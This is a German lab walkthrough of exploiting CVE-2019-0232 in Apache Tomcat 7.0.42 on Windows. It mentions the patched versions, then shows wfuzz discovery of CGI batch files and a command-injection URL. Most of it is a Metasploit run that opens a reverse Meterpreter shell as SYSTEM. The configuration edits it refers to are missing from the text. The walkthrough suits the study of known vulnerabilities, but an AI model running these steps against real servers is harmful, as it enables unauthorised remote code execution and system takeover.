
CVE-2019-0232-Remotecodeausführung auf Apache Tomcat 7.0.42
CVE-2019-0232 Exploit Remote Code Execution (RCE) im CGI Servlet – Apache Tomcat unter Windows
Apache Tomcat weist eine Schwachstelle im CGI Servlet auf, die ausgenutzt werden kann, um eine Remote Code Execution (RCE) zu erreichen. Dies ist nur ausnutzbar, wenn es unter Windows in einer nicht standardmäßigen Konfiguration zusammen mit Batch-Dateien läuft.
Der Hersteller hat einen Fix in den Tomcat-Versionen 7.0.94, 8.5.40 und 9.0.19 veröffentlicht. Benutzer werden aufgefordert, so bald wie möglich zu aktualisieren. CVE-2019-0232 wurde zugewiesen, um dieses Problem zu verfolgen.
Erforderlich, um dies auszunutzen:
Virtual Box: Windows 7 x86 Tomcat 7.0.42 Java JRE installiert
Nach der Installation von Tomcat 7.0.42 nehmen wir die folgenden Änderungen vor:
Inhalt von /webapps/ROOT/WEB-INF/

Im cgi-Ordner habe ich 2 Dateien erstellt: hello.bat und test.bat

Der Wert Context privileged=true muss in /conf/context.xml hinzugefügt werden

Nehmen Sie die folgenden Änderungen in /conf/web.xml vor

und

Testen, ob eine *bin-Datei auf dem Server vorhanden ist
root@setrus:~# wfuzz -c -z file,/usr/share/wordlists/rockyou.txt --hc 404 http://192.168.1.174:8080/cgi/FUZZ.bat
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.2.9 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.174:8080/cgi/FUZZ.bat
Total requests: 14344392
==================================================================
ID Response Lines Word Chars Payload
==================================================================
000060: C=200 1 L 1 W 14 Ch "hello"
006127: C=200 1 L 1 W 14 Ch "HELLO"
010616: C=404 0 L 0 W 0 Ch "bball11"^C

Manueller Test der Ausnutzung durch Aufrufen von : http://localhost:8080/cgi/test.bat%20%20?&dir

Wir führen nun Befehle auf dem Server aus.
Metasploit - Shell auf der Maschine Es gibt ein Metasploit-Modul, das uns eine Shell auf der Maschine geben wird: exploit/windows/http/tomcat_cgi_cmdlineargs
https://www.exploit-db.com/exploits/47073
Hinweis: Damit der Exploit funktioniert, müssen Sie den genauen Pfad zur bat-Datei haben.
msf5 > search CVE-2019-0232
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/tomcat_cgi_cmdlineargs 2019-04-10 excellent Yes Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
msf5 > use exploit/windows/http/tomcat_cgi_cmdlineargs
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > set rhosts 192.168.1.174
rhosts => 192.168.1.174
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > set targeturi /cgi/hello.battargeturi => /cgi/hello.bat
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > exploit
[*] Started reverse TCP handler on 192.168.1.159:4444
[*] Checking if 192.168.1.174 is vulnerable
[*] 192.168.1.174 seems vulnerable, what a good day.
[*] Command Stager progress - 6.95% done (6999/100668 bytes)
[*] Command Stager progress - 13.91% done (13998/100668 bytes)
[*] Command Stager progress - 20.86% done (20997/100668 bytes)
[*] Command Stager progress - 27.81% done (27996/100668 bytes)
[*] Command Stager progress - 34.76% done (34995/100668 bytes)
[*] Command Stager progress - 41.72% done (41994/100668 bytes)
[*] Command Stager progress - 48.67% done (48993/100668 bytes)
[*] Command Stager progress - 55.62% done (55992/100668 bytes)
[*] Command Stager progress - 62.57% done (62991/100668 bytes)
[*] Command Stager progress - 69.53% done (69990/100668 bytes)
[*] Command Stager progress - 76.48% done (76989/100668 bytes)
[*] Command Stager progress - 83.43% done (83988/100668 bytes)
[*] Command Stager progress - 90.38% done (90987/100668 bytes)
[*] Command Stager progress - 97.34% done (97986/100668 bytes)
[*] Sending stage (180291 bytes) to 192.168.1.174
[*] Command Stager progress - 100.02% done (100692/100668 bytes)
[*] Meterpreter session 1 opened (192.168.1.159:4444 -> 192.168.1.174:49185) at 2019-11-21 06:47:23 -0800
meterpreter >
[!] Make sure to manually cleanup the exe generated by the exploit
meterpreter > shell
Process 2116 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files\Apache Software Foundation\Tomcat 7.0_Tomcat7.0.42\webapps\ROOT\WEB-INF\cgi>whoami
whoami
nt authority\system
